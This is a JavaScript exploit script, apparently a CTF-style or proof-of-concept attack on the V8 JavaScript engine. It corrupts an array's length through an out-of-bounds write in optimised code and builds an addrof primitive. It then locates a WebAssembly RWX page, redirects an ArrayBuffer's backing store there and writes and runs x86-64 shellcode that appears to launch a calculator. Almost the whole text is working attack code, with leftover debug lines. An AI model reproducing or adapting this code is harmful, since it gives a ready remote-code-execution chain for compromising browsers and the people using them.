var buf = new ArrayBuffer(8);var f64_buf = new Float64Array(buf);var u64_buf

1. var buf = new ArrayBuffer(8);
2. var f64_buf = new Float64Array(buf);
3. var u64_buf = new Uint32Array(buf);
4.  
5. function ftoi(val) {
6. f64_buf[0] = val;
7. return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
8. }
9. function itof(val) {
10. u64_buf[0] = Number(val & 0xffffffffn);
11. u64_buf[1] = Number(val >> 32n);
12. return f64_buf[0];
13. }
14. function printhex(s, val) {
15. console.log(s+'0x'+val.toString(16));
16. }
17. function gc() {
18. for (let i = 0; i < 100; i++) {
19. new ArrayBuffer(0x100000);
20. }
21. }
22.  
23. var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
24. var wasm_mod = new WebAssembly.Module(wasm_code);
25. var wasm_instance = new WebAssembly.Instance(wasm_mod);
26. var f = wasm_instance.exports.main;
27.  
28. array = Array(0x40000).fill(1.1);
29. args = Array(0x100 - 1).fill(array);
30. args.push(Array(0x40000 - 4).fill(2.2));
31. giant_array = Array.prototype.concat.apply([], args);
32. giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
33.  
34. length_as_double = new Float64Array(new BigUint64Array([0x4848484800000001n]).buffer)[0];
35. function trigger(array) {
36. var x = array.length;
37. x -= 67108861;
38. x = Math.max(x, 0);
39. x *= 6;
40. x -= 5;
41. x = Math.max(x, 0);
42. let corrupting_array = [0.1, 0.1];
43. let corrupted_array = [0.1];
44. corrupting_array[x] = length_as_double;
45. return [corrupting_array, corrupted_array];
46. }
47.  
48. for (let i = 0; i < 30000; ++i) {
49. trigger(giant_array);
50. }
51. gc();
52.  
53. var corrupted_array = trigger(giant_array)[1];
54. var idk = [1.1];
55. var target_array = [itof(0x1337133713371337n),itof(0x1338133813381338n),itof(0x1339133913391339n)]
56. var target_array2 = [itof(0x4747474747474747n)];
57. var object_array = [target_array,target_array2,{"A":1}];
58.  
59. console.log("Now");
60. function debug() {
61. for(let i = 1; i < 0x30000; i++) {
62. console.log("FUCK");
63. }
64. }
65. //debug();
66. console.log('corrupted array length: ' + corrupted_array.length.toString(16));
67.  
68. //DebugPrint(target_array);
69. //DebugPrint(target_array2);
70. //DebugPrint(object_array);
71.  
72. var search_space = [[0x8080000,0x0818d000],[0x81c0000,0x81c1000],[0x08200000,0x08280000],[0x083c0000,0x086c1000],[0x08700000,0x08900000],[0x08ac0000,0x090c1000],[0x09100000,0x29101000],[0x29140000,0x59141000],[0x59180000,0x599c0000]];
73.  
74. ////DebugPrint(corrupted_array);
75.  
76. var index = -1;
77. var d = 1;
78.  
79. for(var j = 0; j <= 5; j++) {
80. for(var i = search_space[j][0]/8; i < (search_space[j][1]/8) - 1; i++ ) {
81. if(ftoi(corrupted_array[i]) == 0x4747474747474747n) {
82. index = i;
83. d = 0;
84. break;
85. }
86. }
87. if(d == 0) {
88. break;
89. }
90.  
91. }
92. ////DebugPrint(target_array);
93. ////DebugPrint(target_array2);
94. ////DebugPrint(object_array);
95. ////DebugPrint(fuck);
96.  
97. if(index == -1) {
98. throw new Error("Not found");
99. }
100.  
101. printhex("Found at",index*8);
102.  
103. ////DebugPrint(target_array);
104. ////DebugPrint(target_array2);
105. ////DebugPrint(object_array);
106. ////DebugPrint(fuck);
107.  
108. var object_array_map = ftoi(corrupted_array[index + (0x58/8)]);
109. printhex('object array map: ',object_array_map);
110. var double_array_map = ftoi(corrupted_array[index - (0x160/8)]);
111. var double_array_properties = ftoi(corrupted_array[index - (0x158/8)])&0xffffffffn;
112. var double_map = (double_array_properties<<32n) + (double_array_map>>32n)
113.  
114. function addrof(object) {
115. object_array[0] = object;
116. corrupted_array[index+(0x58/8)] = itof(double_map);
117. var address = ftoi(object_array[0]);
118. corrupted_array[index+(0x58/8)] = itof(object_array_map);
119. return address;
120. }
121.  
122. //debug();
123. var w_instance = addrof(wasm_instance)&0xffffffffn - 1n;
124. printhex("HMM: ",w_instance);
125.  
126. if(((w_instance&0xfn) == 0x8n) || ((w_instance&0xfn) == 0x0n)) {
127. var rwx_index = (w_instance + 0x60n);
128. var rwx_page = ftoi(corrupted_array[rwx_index/8n]);
129. printhex("PAGE: ",rwx_page);
130. }
131. else {
132. var rwx_index = (w_instance+0x64n) ;
133. var rwx_upper = (ftoi(corrupted_array[rwx_index/8n])&0xffffffffn)<<32n;
134. var rwx_lower = (ftoi(corrupted_array[(rwx_index-8n)/8n])&0xffffffff00000000n)>>32n;
135. var rwx_page = rwx_upper + rwx_lower;
136. printhex("PAGE: ",rwx_page);
137.  
138. }
139.  
140. print("writing shellcode: ");
141. //Shellcode
142.  
143. var buf = new ArrayBuffer(0x100);
144. var dataview = new DataView(buf);
145. var buff_addr = (addrof(buf)&0xffffffffn)-1n;
146. printhex("00: ",buff_addr);
147. ////DebugPrint(buf);
148. if ((buff_addr & 0xfn) == 0n || (buff_addr & 0xfn) == 8n) {
149. backing_store = buff_addr + 0x8n;
150. lower_half = buff_addr + 0x10n;
151. upper_half = buff_addr + 0x8n;
152. corrupted_array[lower_half/8n] = itof(0x4141414100000000n+((rwx_page&0xffffffff00000000n)>>32n));
153. corrupted_array[upper_half/8n] = itof((rwx_page&0xffffffffn)<<32n);
154. print("FUCK");
155. }
156. else {
157. backing_store = buff_addr + 0xcn;
158. corrupted_array[backing_store/8n] = itof(rwx_page);
159. }
160. printhex("Backing store: ",backing_store);
161. var shellcode = [0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
162. for (var i = 0; i < shellcode.length; i++) {
163. dataview.setUint32(4*i,shellcode[i],true);
164. }
165. f();
166. ////SystemBreak();